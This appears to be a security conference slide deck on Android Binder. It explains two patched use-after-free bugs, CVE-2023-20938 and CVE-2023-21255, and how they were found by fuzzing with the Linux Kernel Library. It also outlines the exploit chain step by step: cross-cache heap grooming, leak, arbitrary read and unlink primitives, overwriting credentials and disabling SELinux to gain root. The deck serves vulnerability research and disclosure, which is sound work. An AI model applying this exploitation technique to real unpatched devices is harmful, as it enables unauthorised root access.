0% found this document useful (0 votes)
42 views84 pages

Offensivecon 24 Binder

Offesinve

Uploaded by

ykaitokit
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
42 views84 pages

Offensivecon 24 Binder

Offesinve

Uploaded by

ykaitokit
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 84

How to Fuzz Your Way to

Android Universal Root:


Attacking Android Binder

Eugene Rodionov, Zi Fan Tan, Gulshan Singh

10-May-2024
Agenda

● Introduction in Android Binder


● CVE-2023-20938 & CVE-2023-21255 UAF Details
● Exploitation of CVE-2023-20938
● Fuzzing Binder with LKL
● Conclusion
Introduction

Proprietary + Confidential
Who we are

Increase Android security by attacking key components and features, identifying


critical vulnerabilities before adversaries

● Offensive Security Reviews to verify (break) security assumptions


● Scale through tool development (e.g. continuous fuzzing)
● Develop proof of concepts to demonstrate real-world impact
● Assess the efficacy of security mitigations
Binder Overview

Proprietary + Confidential
What is Binder?

● Primary inter-process communication (IPC) channel on Android


● Support passing file descriptors, objects containing pointers, etc.
● Composed of a userspace library (libbinder) and a kernel driver (/dev/binder)
● Provide Remote Procedure Call (RPC) framework for Java and C/C++
Why Binder?

● High vulnerabilities per thousand lines of code


○ ~7k lines of C code (3 vulns / 1K lines)
● Wide attack surface
○ Accessible by all untrusted apps
○ Historically, exploited from Chrome for sandbox escapes
● Recently exploited for root privilege escalation
○ Waterdrop (2019), Bad Binder (2019), CVE-2020-0041 (2020), Typhoon Mangkhut (2020), Bad Spin (2022)
● Complex object lifetime, memory management model, and highly complex
multithreading model
○ 5 different locks, 6 reference counters, as well as atomic variables
○ Our initial assumption was data races would be the primary cause of vulnerabilities, but refcount bugs
were more prevalent
Binder Threat Model

App
RPC System Services RPC
System Services Untrusted App
libbinder System Service
(Binder userspace library)

Userspace ioctl ioctl ioctl

Kernel

/dev/binder (Binder driver)


Binding IPC Endpoints: Workflow

Process A Process B
4. Perform RPC Calls
MyService.myMethod(args)
MyService IMyService

1. Send a Node of MyService


Userspace ioctl to Process B ioctl

/dev/binder
(Kernel) 2. Binder creates a Node 3. Binder creates a Ref

Node 0xbeef Ref 0xbeef


Refcount 1
0
Binder Context Manager
● Context Manager is a special Binder
IPC endpoint always accessible at
Process A
handle 0
MyService ● In Android, ServiceManager process
serves as Binder Context Manager
1. Send a Node of MyService
Userspace to Process B ● Android components register their
ioctl
Binder Nodes with the
/dev/binder How does Binder know where to ServiceManager to be discoverable
(Kernel) send the Node 0xbeef?
by other endpoints
Node 0xbeef
Refcount 0
Binder Transactions struct binder_write_read

write_size = sizeof(write_buffer)

write_buffer BC_TRANSACTION struct binder_transaction_data …

● Accessible via BINDER_WRITE_READ ioctl read_size = sizeof(read_buffer)

read_buffer …
● Transfer Binder objects between the IPC …

endpoints: struct binder_transaction_data

target.handle =0 0 8 12
○ Binder Node
buffer struct flat_binder_object struct binder_fd_object …
○ Binder Ref offsets

○ Linux file descriptor … 0 8 …

○ Binder buffer pointers

● Binder objects are “translated” from the Binder Objects


struct flat_binder_object struct binder_fd_object
sender’s context into the recipient context
type = BINDER_TYPE_BINDER type = BINDER_TYPE_FD

binder = 0xbeef fd = 123

… …

Binder Node File Descriptor


Vulnerabilities
CVE-2023-20938 & CVE-2023-21255

Proprietary + Confidential
Vulnerability Description (1)
● When sending a transaction, Binder translates objects to another form
○ Translate a Binder Node to a Binder Ref or vice versa
○ Install new file descriptors in another process for file sharing

binder_size_t buffer_offset = 0;
if (!IS_ALIGNED(tr->offsets_size, sizeof(binder_size_t))) {
goto err_bad_offset;
}
for (buffer_offset = off_start_offset; buffer_offset < off_end_offset;
buffer_offset += sizeof(binder_size_t)) {
// ...
}
err_bad_offset:
binder_transaction_buffer_release(target_proc, NULL, t->buffer,
buffer_offset, /*is_failure*/true);
Vulnerability Description (2)
● If an error occurs in the loop, we need to clean all objects translated so far
● Cleanup function is passed the offset in the buffer it’s reached and is_failure
set to true
binder_size_t buffer_offset = 0;
if (!IS_ALIGNED(tr->offsets_size, sizeof(binder_size_t))) {
goto err_bad_offset;
}
for (buffer_offset = off_start_offset; buffer_offset < off_end_offset;
buffer_offset += sizeof(binder_size_t)) {
// if error: goto err_bad_offset
}
err_bad_offset:
binder_transaction_buffer_release(target_proc, NULL, t->buffer,
buffer_offset, /*is_failure*/true);
Vulnerability Description (3)
● What happens if an error happens before any objects are processed?

binder_size_t buffer_offset = 0;
if (!IS_ALIGNED(tr->offsets_size, sizeof(binder_size_t))) {
goto err_bad_offset;
}
for (buffer_offset = off_start_offset; buffer_offset < off_end_offset;
buffer_offset += sizeof(binder_size_t)) {
// if error: goto err_bad_offset
}
err_bad_offset:
binder_transaction_buffer_release(target_proc, NULL, t->buffer,
buffer_offset, /*is_failure*/true);
Vulnerability Description (4)

void binder_transaction_buffer_release(binder_proc *target_proc, binder_buffer *buffer,


size_t failed_at /*buffer_offset*/, bool is_failure) {
off_start_offset = ALIGN(buffer->data_size, sizeof(void *));
off_end_offset = is_failure && failed_at /*0*/ ? failed_at
: off_start_offset + buffer->offsets_size;
for (buffer_offset = off_start_offset; buffer_offset < off_end_offset;
buffer_offset += sizeof(size_t)) {
case BINDER_TYPE_BINDER: {
flat_binder_object *fp = to_flat_binder_object(hdr);
binder_node *node = binder_get_node(target_proc, fp->binder);
binder_dec_node(node, hdr->type == BINDER_TYPE_BINDER, 0);
binder_put_node(node);
}
}
}
Vulnerability Description (4)
● There are cases where a buffer offset of zero is passed to this function with
is_failure set to true, to indicate that the entire buffer needs to be cleaned
void
up.
binder_transaction_buffer_release(binder_proc *target_proc, binder_buffer *buffer,
size_t failed_at /*buffer_offset*/, bool is_failure) {
off_start_offset = ALIGN(buffer->data_size, sizeof(void *));
off_end_offset = is_failure && failed_at /*0*/ ? failed_at
: off_start_offset + buffer->offsets_size;
for (buffer_offset = off_start_offset; buffer_offset < off_end_offset;
buffer_offset += sizeof(size_t)) {
case BINDER_TYPE_BINDER: {
flat_binder_object *fp = to_flat_binder_object(hdr);
binder_node *node = binder_get_node(target_proc, fp->binder);
binder_dec_node(node, hdr->type == BINDER_TYPE_BINDER, 0);
binder_put_node(node);
}
}
}
Vulnerability Description (4)
● There are cases where a buffer offset of zero is passed to this function with
is_failure set to true, to indicate that the entire buffer needs to be cleaned
void
up.
binder_transaction_buffer_release(binder_proc *target_proc, binder_buffer *buffer,
size_t failed_at /*buffer_offset*/, bool is_failure) {
off_start_offset = ALIGN(buffer->data_size, sizeof(void *));
off_end_offset = is_failure && failed_at /*0*/ ? failed_at
: off_start_offset + buffer->offsets_size;
for (buffer_offset = off_start_offset; buffer_offset < off_end_offset;
buffer_offset += sizeof(size_t)) {
case BINDER_TYPE_BINDER: {
flat_binder_object *fp = to_flat_binder_object(hdr);
binder_node *node = binder_get_node(target_proc, fp->binder);
binder_dec_node(node, hdr->type == BINDER_TYPE_BINDER, 0);
binder_put_node(node);
}
}
}
Start
binder_transaction
Vulnerability Overview
Copy all transaction objects
from user space buffer into
kernel buffer

False
Validate
transaction
True

Get next transaction object


in kernel buffer
Vulnerable Path
False
Validate
object

True
Side-effect:
Translate
Increment Node
Ref to Node
reference counters

Side-effect: “Untranslate” More True


Decrement Node All objects & object?
reference counters rollback state
False

Finish
binder_transaction
Vulnerability Explained (Initial State)
Thread A /dev/binder (Kernel) Thread B

Thread A State Thread B State

Pending Transaction

To: Node 0xbeef

MyService Node 0xbeef Ref 0xbeef IMyService


(0xbeef) Refcount 2
Vulnerability Explained (Normal Workflow)
Thread A /dev/binder (Kernel) Thread B

To: Thread A’s Node ioctl

(Ref) 0xbeef

Thread A State Thread B State

Pending Transaction

To: Node 0xbeef

MyService Node 0xbeef Ref 0xbeef IMyService


(0xbeef) Refcount 2
Vulnerability Explained (Normal Workflow)
Thread A /dev/binder (Kernel) Thread B

To: Thread A’s Node Translate To: Thread A’s Node ioctl

(Node) 0xbeef (Ref) 0xbeef


- Translated Ref to Node
- Refcount + 1

Thread A State Thread B State

Pending Transaction

To: Node 0xbeef

MyService Node 0xbeef Ref 0xbeef IMyService


(0xbeef) Refcount 3
2
Vulnerability Explained (Attacker Workflow)
Thread A /dev/binder (Kernel) Thread B

To: Thread A’s Node ioctl

(Node) 0xbeef
Send Node instead of Ref
with unaligned offsets_size

Thread A State Thread B State

Pending Transaction

To: Node 0xbeef

MyService Node 0xbeef Ref 0xbeef IMyService


(0xbeef) Refcount 2
Vulnerability Explained (Attacker Workflow)
Thread A /dev/binder (Kernel) Thread B

To: Thread A’s Node Error path To: Thread A’s Node ioctl

(Node) 0xbeef (Node) 0xbeef


- No translation occured Send Node instead of Ref
- goto err_bad_offset; with unaligned offsets_size

Thread A State Thread B State

Pending Transaction

To: Node 0xbeef

MyService Node 0xbeef Ref 0xbeef IMyService


(0xbeef) Refcount 2
Vulnerability Explained (Attacker Workflow)
Thread A /dev/binder (Kernel) Thread B

Thread A State Thread B State

Pending Transaction

To: Node 0xbeef

MyService Node 0xbeef Ref 0xbeef IMyService


(0xbeef) Refcount 1
2
Vulnerability Explained (Attacker Workflow)
Thread A /dev/binder (Kernel)

Killed Thread B

Thread A State

Pending Transaction

To: Node 0xbeef

MyService Node 0xbeef


(0xbeef) Refcount 0
1
Vulnerability Explained (Attacker Workflow)
Thread A /dev/binder (Kernel)

Killed Thread B

Thread A State

Pending Transaction

To: Node 0xbeef

MyService Node
Node 0xbeef
0xbeef
(0xbeef) Refcount
Freed 01
Vulnerability Explained (Attacker Workflow)
Thread A /dev/binder (Kernel)

ioctl Use-after-free occured Killed Thread B


when reading the
pending transaction

Thread A State

Pending Transaction

To: Node 0xbeef

MyService Node
Node 0xbeef
0xbeef
(0xbeef) Refcount
Freed 01
CVE-2023-20938 Remediation

● CVE-2023-20938 was identified via fuzzing on android13-5.10 kernel


● The test case wasn’t reproducible on android13-5.15 ACK due to this patch1
Before patch: all the binder transaction objects - if (binder_alloc_copy_user_to_buffer(
- &target_proc->alloc,
are copied from user space into the binder - t->buffer, 0,
kernel buffer before translating the objects - (const void __user *)
- (uintptr_t)tr->data.ptr.buffer,
- tr->data_size)) {
After patch: binder transaction objects are
copied from user space into the binder kernel // ...
for (buffer_offset = off_start_offset;
buffer during translation of the objects as they buffer_offset < off_end_offset;
are being processed buffer_offset += sizeof(binder_size_t)) {

+ if (copy_size && (user_offset > object_offset ||


● CVE-2023-20938 was fixed by back-porting + binder_alloc_copy_user_to_buffer(
the patch to the vulnerable kernels in + &target_proc->alloc,
+ t->buffer, user_offset,
2023-02-01 ASB2: + user_buffer + user_offset,
+ copy_size))) {
○ android13-5.10
○ android12-5.4 // translate binder object
} buffer_offset, /*isfailure*/true);
[1] https://github.com/torvalds/linux/commit/6d98eb95b450a75adb4516a1d33652dc78d2b20c
[2] https://source.android.com/docs/security/bulletin/2023-02-01#kernel
Start Start
Before the patch binder_transaction After the patch binder_transaction

Copy all transaction objects False


Validate
from user space buffer into transaction
kernel buffer
True

False Get next transaction object


Validate
in kernel buffer
transaction
True
False
Get next transaction object Validate
in kernel buffer object

Vulnerable Path Vulnerable Path?

False Copy object into kernel


Validate
object buffer

True True

Translate Translate
Ref to Node Ref to Node

True True
“Untranslate” “Untranslate” More
More
All objects & All objects & object?
object?
rollback state rollback state
False False

Finish Finish
binder_transaction binder_transaction
Discovery of CVE-2023-21255

● The binder kernel buffer isn’t zeroed between ioctls


● Any data from the previously processed transactions would remain in the buffer
○ … and would be processed in binder_transaction_buffer_release on the error path!

● The fuzzer identified another test case triggering the same UAF issue
○ Send a valid transaction with a binder node to pollute the binder kernel buffer
○ Send the malformed transaction with misaligned offsets to trigger the error path
■ binder_transaction_buffer_release would roll back the binder node translation at
the previous step => UAF

● CVE-2023-21255 was fixed in 2023-07-01 ASB1

[1] https://source.android.com/docs/security/bulletin/2023-07-01#kernel
Exploitation

Proprietary + Confidential
Exploitation Steps

1. Leak Primitive1 2. Unlink Primitive1 3. Arbitrary Read1 4. Root

Exploit vulnerability to Exploit vulnerability to


Leak a pointer to a Locate struct task_struct
create a dangling pointer to create a dangling pointer to
struct file & struct cred
binder_node binder_node

Allocate a kernel object Allocate a fake


Overwrite inode pointer Overwrite all user and
overlaying the freed binder_node overlaying
field in struct file group IDs with 0
binder_node the freed binder_node

Leak values from a kernel Arbitrary write when


Bypass KASLR Disable SELinux
object (UaF) unlinking (UaF)

[1] https://labs.bluefrostsecurity.de/blog/2020/04/08/cve-2020-0041-part-2-escalating-to-root/
Leak Primitive
static int binder_thread_read(...)
struct binder_transaction_data_secctx tr;
struct binder_transaction_data *trd = &tr.transaction_data;
...
trd->target.ptr = target_node->ptr; [1]
trd->cookie = target_node->cookie; [1]
...
if (copy_to_user(ptr, &tr, trsize)) { [2]
struct binder_node
Thread A (dangling node)
To: Thread A

trd.target.ptr uintptr_t ptr 88


trd.cookie uintptr_t cookie 96
Userspace Kernel …
Leak Primitive
static int binder_thread_read(...)
struct binder_transaction_data_secctx tr;
struct binder_transaction_data *trd = &tr.transaction_data;
...
trd->target.ptr = target_node->ptr; [1]
trd->cookie = target_node->cookie; [1]
...
if (copy_to_user(ptr, &tr, trsize)) { [2]
struct binder_node
Thread A [1] (dangling node)
To: Thread A

trd.target.ptr
0x1337 uintptr_t ptr 88
trd.cookie
0x1337 uintptr_t cookie 96
Userspace Kernel …
Leak Primitive
static int binder_thread_read(...)
struct binder_transaction_data_secctx tr;
struct binder_transaction_data *trd = &tr.transaction_data;
...
trd->target.ptr = target_node->ptr; [1]
trd->cookie = target_node->cookie; [1]
...
if (copy_to_user(ptr, &tr, trsize)) { [2]
struct binder_node
Thread A [2] (dangling node)
To: Thread A

0x1337 uintptr_t ptr 88


0x1337 uintptr_t cookie 96
Userspace Kernel …
Leak Primitive
1. Exploit the vulnerability to free a binder_node
2. Allocate a kernel object at the same memory location
3. Leak values of a kernel object (at offset 88 and 96)
Kernel Address Space

To: Thread A struct binder_node


trd.target.ptr
88 uintptr_t
ptr ptr
trd.cookie
96 uintptr_t
cookie cookie
Leak Primitive
1. Exploit the vulnerability to free a binder_node
2. Allocate a kernel object at the same memory location
3. Leak values of a kernel object (at offset 88 and 96)
Kernel Address Space

Dangling Pointer
To: Thread A
trd.target.ptr
trd.cookie
Leak Primitive
1. Exploit the vulnerability to free a binder_node
2. Allocate a kernel object at the same memory location
3. Leak values of a kernel object (at offset 88 and 96)
Kernel Address Space

Dangling Pointer
To: Thread A struct
struct
binder_node
epitem
trd.target.ptr
88 uintptr_t
struct
ptrlist_head
ptr *next
trd.cookie
96 struct
uintptr_t
list_head
cookie cookie *prev
Allocate a kernel object
from the same memory
Leak Primitive
1. Exploit the vulnerability to free a binder_node
2. Allocate a kernel object at the same memory location
3. Leak values of a kernel object (at offset 88 and 96)
Kernel Address Space

Dangling Pointer
To: Thread A struct
struct
binder_node
epitem
trd.target.ptr
next
88 uintptr_t
struct
ptrlist_head
ptr *next
trd.cookie
prev
96 struct
uintptr_t
list_head
cookie cookie *prev
Allocate a kernel object
from the same memory
Leak Primitive
How can we overlay another kernel object (epitem) onto the freed binder_node?
● Much easier in userspace (e.g. glibc)
○ malloc uses the same freelist regardless of object types
● Linux Kernel is more complicated: SLUB allocator
○ Different object types can be allocated from different caches
● Many mitigations enabled in recent years
○ CONFIG_SLAB_FREELIST_HARDENED
○ CONFIG_SLAB_FREELIST_RANDOM
○ GFP_KERNEL_ACCOUNT*
○ No more cache aliasing for `epitem` (SLAB_ACCOUNT)
○ No unprivileged userfaultd (for heap spraying)
* Removed in 5.9 and added back in 5.14 (we’re targeting 5.10)
Cross-cache Attack (SLUB Allocator)
Physical Memory

Allocate

Free
Cross-cache Attack (SLUB Allocator)
Page Allocator
(Buddy Allocator)

Per-CPU
Page Cache
Physical Memory

Allocate

Free
Cross-cache Attack (SLUB Allocator)
Page Allocator SLUB Allocator
(Buddy Allocator)
kmem_cache (kmalloc-128)

Per-CPU
Page Cache kmem_cache_cpu
Physical Memory

Active Slab

Partial Slabs

kmem_cache (eventpoll_epi)

Allocate
kmem_cache_cpu
Active Slab
Free
Partial Slabs
Cross-cache Attack (SLUB Allocator)
Page Allocator SLUB Allocator
(Buddy Allocator)
kmem_cache (kmalloc-128)

Per-CPU
Page Cache kmem_cache_cpu
Physical Memory

Active Slab

Partial Slabs

kmem_cache (eventpoll_epi)

Allocate
kmem_cache_cpu
Active Slab
Free
Partial Slabs
Cross-cache Attack (SLUB Allocator)
Page Allocator SLUB Allocator
(Buddy Allocator)
kmem_cache (kmalloc-128) slab

Per-CPU
Page Cache kmem_cache_cpu
Physical Memory

Active Slab

Partial Slabs …

kmem_cache (eventpoll_epi)

Allocate
kmem_cache_cpu
Active Slab
Free
Partial Slabs
Cross-cache Attack (SLUB Allocator)
Page Allocator SLUB Allocator
(Buddy Allocator)
kmem_cache (kmalloc-128) slab

struct binder_node
Per-CPU
Page Cache kmem_cache_cpu
Physical Memory

Active Slab

Partial Slabs …

kmem_cache (eventpoll_epi)

Allocate
kmem_cache_cpu
Active Slab
Free
Partial Slabs
Cross-cache Attack (SLUB Allocator)
Page Allocator SLUB Allocator
(Buddy Allocator)
kmem_cache (kmalloc-128) slab

struct binder_node
Per-CPU
Page Cache kmem_cache_cpu
Physical Memory

Active Slab

Partial Slabs …

kmem_cache (eventpoll_epi)

Allocate
kmem_cache_cpu
Active Slab
Free
Partial Slabs
Cross-cache Attack (SLUB Allocator)
Page Allocator SLUB Allocator
(Buddy Allocator) Dangling pointer

kmem_cache (kmalloc-128) slab

Dangling Node
Per-CPU
Page Cache kmem_cache_cpu
Physical Memory

Active Slab

Partial Slabs …

kmem_cache (eventpoll_epi)

Allocate
kmem_cache_cpu
Active Slab
Free
Partial Slabs
Cross-cache Attack (SLUB Allocator)
x1000+
Page Allocator SLUB Allocator
(Buddy Allocator) Dangling pointer

kmem_cache (kmalloc-128) slab


Dangling Node

Dangling Node
Per-CPU
Dangling Node
Page Cache kmem_cache_cpu
Physical Memory

Dangling Node
Active Slab

Partial Slabs …

kmem_cache (eventpoll_epi)

Allocate
kmem_cache_cpu
Active Slab
Free
Partial Slabs
Cross-cache Attack (SLUB Allocator)
x1000+
Page Allocator SLUB Allocator
(Buddy Allocator) Dangling pointer

kmem_cache (kmalloc-128) slab


Dangling Node

Dangling Node
Per-CPU
Dangling Node
Page Cache kmem_cache_cpu
Physical Memory

Dangling Node
Active Slab

Partial Slabs …

kmem_cache (eventpoll_epi)

Allocate
kmem_cache_cpu
Active Slab
Free
Partial Slabs
Cross-cache Attack (SLUB Allocator)
x1000+
Page Allocator
(Buddy Allocator) Dangling pointer

kmem_cache (kmalloc-128)

Per-CPU
Page Cache kmem_cache_cpu
Physical Memory

Active Slab

Partial Slabs

kmem_cache (eventpoll_epi)

Allocate
kmem_cache_cpu
Free
Partial Slabs
Cross-cache Attack (SLUB Allocator)
x1000+
Page Allocator SLUB Allocator
(Buddy Allocator) Dangling pointer

kmem_cache (kmalloc-128)

Per-CPU
Page Cache kmem_cache_cpu
Physical Memory

Active Slab

Partial Slabs

kmem_cache (eventpoll_epi) slab


Dangling Node

Dangling Node

Dangling Node Allocate


kmem_cache_cpu
Active Slab Dangling Node
Free
Partial Slabs …
Cross-cache Attack (SLUB Allocator)
x1000+
Page Allocator SLUB Allocator
(Buddy Allocator) Dangling pointer

kmem_cache (kmalloc-128)

Per-CPU
Page Cache kmem_cache_cpu
Physical Memory

Active Slab

Partial Slabs

kmem_cache (eventpoll_epi) slab struct epitem


Dangling Node

Dangling Node

Dangling Node Allocate


kmem_cache_cpu
Active Slab Dangling Node
Free
Partial Slabs …
VIDEO DEMONSTRATION OF Cross-cache attack

https://youtu.be/VJWEUsTDtuc
Arbitrary Read
Use Leak Primitive to leak a pointer to a struct file

struct epitem


88
*next
96
*prev

Arbitrary Read
Use Leak Primitive to leak a pointer to a struct file

struct file struct epitem struct epitem

… … …
88 88
*next *next *next
96 96
*prev *prev *prev

… … …
Arbitrary Read
ioctl(fd, FIGETBSZ, &value); // &value == argp

static int do_vfs_ioctl(struct file *filp, ...) {


...
struct inode *inode = file_inode(filp)
...
case FIGETBSZ:
...
return put_user(inode->i_sb->s_blocksize, (int __user *)argp);
Arbitrary Read
ioctl(fd, FIGETBSZ, &value); // &value == argp

return put_user(inode->i_sb->s_blocksize, (int __user *)argp);

struct file

struct inode struct super_block


inode
40 bytes 24 bytes

f_ep_links.next s_blocksize
i_sb
f_ep_links.prev …


Arbitrary Read
ioctl(fd, FIGETBSZ, &value); // &value == argp

return put_user(inode->i_sb->s_blocksize, (int __user *)argp);

struct file

… struct epitem


struct inode struct super_block
inode
40 bytes 40 bytes 24 bytes

f_ep_links.next s_blocksize
i_sb event.data
f_ep_links.prev …
… Can be modified directly
… with epoll_ctl() syscall
Arbitrary Read
ioctl(fd, FIGETBSZ, &value); // &value == argp

return put_user(inode->i_sb->s_blocksize, (int __user *)argp);


Kernel Address Space
struct file

… struct epitem


struct super_block
inode
40 bytes 24 bytes

f_ep_links.next s_blocksize
event.data
f_ep_links.prev …
Can be modified directly
… with epoll_ctl() syscall
Unlink primitive
1. Exploit the vulnerability to create a dangling Node.
2. Allocate a fake binder_node with sendmsg() syscall (heap spray).

Kernel Address Space

Dangling Pointer
struct binder_node
Unlink primitive
1. Exploit the vulnerability to create a dangling Node.
2. Allocate a fake binder_node with sendmsg() syscall (heap spray).

Kernel Address Space

Dangling Pointer
struct binder_node fake binder_node

ptr
Allocate a kernel object cookie
with data we controlled
(heap spray)
Unlink primitive
● Use-after-free when decrementing the refcount of a binder_node

static bool binder_dec_node_nilocked(struct binder_node *node, ...) {


...
// If binder_node`s refcount reaches 0
// and satisfy all checks
...
hlist_del(&node->dead_node); *pprev = next
... *(next + 8) = pprev

}
Root Privilege Escalation

1. Obtain an address to struct cred


struct binder_node struct binder_proc struct task_struct struct cred
a.
... ... ... ...
proc task cred kuid_t uid
... … ... kgid_t gid
kuid_t suid
kgid_t sgid
2. Set uids & gids to 0 kuid_t euid
kgid_t egid
kuid_t fsuid
3. Set selinux_state.enforcing to 0 to disable SELinux
kgid_t fsgid
...
4. Seccomp and Linux capabilities (not covered)
Demo
Root privilege escalation on Pixel 6 & Pixel 7

Proprietary + Confidential
VIDEO DEMONSTRATION OF FULL EXPLOIT ON
PIXEL 6 PRO & PIXEL 7 PRO

https://youtu.be/7qFb6RUHnnU
Fuzzing Binder
with Linux Kernel Library (LKL)

Proprietary + Confidential
Binder Fuzzing

● Syzkaller has been fuzzing Binder for years


○ Generate programs based on syscall descriptions to be executed on the
target machine
○ Discovered CVE-2019-2215 (Bad Binder)
○ ~25% line coverage
● Challenges
○ Data dependencies
○ State dependencies
○ Multi-process coordination
○ Reproduce and catch issues involving race conditions
struct object {
char *x_ptr;
char *y_ptr;
Binder Fuzzing Challenges };
object
x_ptr y_ptr

scatter x

Data dependencies y

● Binder commands
struct struct struct
● Scatter-gather data structures binder_buffer_object binder_buffer_object binder_buffer_object

(BINDER_TYPE_PTR) gather x_ptr y_ptr x y

State dependencies Client Client

● Synchronous IPC call


○ Cannot send transaction to oneself
○ Multiple outstanding transactions not
allowed return
call
Binder Fuzzing Challenges
ioctl(binder_fd, BINDER_WRITE_READ, x) // 1.
State dependencies // y = x->read_buffer->...->buffer
ioctl(binder_fd, BC_FREE_BUFFER, y ) // 2.
● Some inputs depend on previous
IOCTL calls
○ e.g. Transaction buffers (BC_FREE_BUFFER)
Binder memory map

Multi-process coordination Context Manager

● All communication requires a 1. Send Node


Client
2. Request Ref
Context Manager
● Node & Ref setup is required to Client Client
establish a connection 3. Connection established
LKL Application
LKL Overview Shared memory
Threads
with LKL
Linux Kernel Library (LKL)1 builds Linux
kernel as a user-space library
● Implemented as Linux arch-port LKL syscall API
● LKL vs UML
Linux kernel
LKL building blocks
Generic VFS Binder
● Host environment API -- portability layer LKL arch
● Linux kernel code NET ...
● LKL syscall API exposed to the
user-space application
LKL Host environment API
Run kernel code without launching a VM POSIX Win32

● Kernel unit testing


● Fuzzing!2,3 user space

kernel space
[1] https://github.com/lkl/linux
[2] Xu et al., Fuzzing File Systems via Two-Dimensional Input Space Exploration
[3] https://github.com/atrosinenko/kbdysch Host kernel
Linux Android Windows
Anatomy of LKL fuzzer
LKL enables fuzzing Linux kernel
GNU Linux x86_64 user-space process
code in user-space
● Use in-process fuzzing engine, such as Fuzzing coverage
libFuzzer & crash detection

Advantages
Linux kernel + KASan
● High fuzzing performance on x86_64 libFuzzer-based
● Ease of custom modifications Binder fuzzing harness
○ e.g. mocking hardware, custom device driver
scheduler(?)

Limitations
Fuzz data
● No SMP in LKL
● x86_64 vs aarch64 -- potential false
positives, false negatives
Using LKL from your C program
int ret = lkl_start_kernel(&lkl_host_ops, "mem=50M");

lkl_mount_fs("sysfs");
lkl_mount_fs("proc");
lkl_mount_fs("dev");

int binder_fd = lkl_sys_open("/dev/binder", O_RDWR | O_CLOEXEC, 0);


void *binder_map = lkl_sys_mmap(NULL, BINDER_VM_SIZE,
PROT_READ, MAP_PRIVATE, binder_fd, 0);

struct lkl_binder_version version = { 0 };


ret = lkl_sys_ioctl(binder_fd, LKL_BINDER_VERSION, &version);
Using LKL from your C program
int ret = lkl_start_kernel(&lkl_host_ops, "mem=50M");

lkl_mount_fs("sysfs");
lkl_mount_fs("proc");
lkl_mount_fs("dev");

int binder_fd = lkl_sys_open("/dev/binder", O_RDWR | O_CLOEXEC, 0);


void *binder_map = lkl_sys_mmap(NULL, BINDER_VM_SIZE,
PROT_READ, MAP_PRIVATE, binder_fd, 0);

struct lkl_binder_version version = { 0 };


ret = lkl_sys_ioctl(binder_fd, LKL_BINDER_VERSION, &version);
Using LKL from your C program
int ret = lkl_start_kernel(&lkl_host_ops, "mem=50M");

lkl_mount_fs("sysfs");
lkl_mount_fs("proc");
lkl_mount_fs("dev");

int binder_fd = lkl_sys_open("/dev/binder", O_RDWR | O_CLOEXEC, 0);


void *binder_map = lkl_sys_mmap(NULL, BINDER_VM_SIZE,
PROT_READ, MAP_PRIVATE, binder_fd, 0);

struct lkl_binder_version version = { 0 };


ret = lkl_sys_ioctl(binder_fd, LKL_BINDER_VERSION, &version);
Using LKL from your C program
int ret = lkl_start_kernel(&lkl_host_ops, "mem=50M");

lkl_mount_fs("sysfs");
lkl_mount_fs("proc");
lkl_mount_fs("dev");

int binder_fd = lkl_sys_open("/dev/binder", O_RDWR | O_CLOEXEC, 0);


void *binder_map = lkl_sys_mmap(NULL, BINDER_VM_SIZE,
PROT_READ, MAP_PRIVATE, binder_fd, 0);

struct lkl_binder_version version = { 0 };


ret = lkl_sys_ioctl(binder_fd, LKL_BINDER_VERSION, &version);
Fuzzing harness
Fuzz data
client_1 {
binder_write {
● Simulate IPC interactions binder_commands {
transaction {
between multiple clients binder_objects { binder { ptr: 0xbeef } }
}
● 3 clients (1 Context Manager) }
○ IOCTL calls and data }
}
client_2 {
binder_read { ... }
Fuzzing harness binder_write {
binder_commands { free_buffer { ... } }
Context Manager
}
Client 2 }
client_3 { ... }
client_2 { ... }
client_3 { ... }
Client 1 Client 3 client_1 { ... }
Linux Kernel Library

Randomized Scheduler Fuzz data


Randomized
Scheduler
Client
Thread
Client
Thread

...
Deterministically simulate thread
interleaving based on fuzz data1 yield

Insert yield points before/after schedule schedule

synchronization primitives lock

● spin_lock, spin_unlock ...

● mutex_lock, mutex_unlock
unlock
yield

schedule schedule
[1] Williamson, N., Catch Me If You Can: Deterministic Discovery of
Race Conditions with Fuzzing. Black Hat USA, (2022). lock
Results

● Achieved 68% line coverage


● Discovered CVE-2023-20938 & CVE-2023-21255
Future work

● Upstream Binder fuzzer to github.com/lkl/linux

● Explore ways to add thread interleaving information into fuzzing engine

● Improve Syzkaller Binder code coverage by tackling those challenges


Tools
Tools
linux-exploit-dev-env
● gsingh93/linux-exploit-dev-env
● Environment for exploit development on Linux and Android Common Kernel
● QEMU - supports x86_64 and arm64
pwndbg: slab, pcp, binder plugin
● slab - inspect SLAB allocator states
● pcp - inspect per-cpu cache (pwndbg/pull/1487)
● binder - inspect Binder states: nodes, refs, transactions and etc. (pwndbg/pull/1488)
bpftrace scripts
● Trace SLAB and page allocations for heap grooming and cross-cache attacks
● Keep an eye on https://github.com/androidoffsec for a future release
Thank You! Questions?
[email protected]

Proprietary + Confidential

You might also like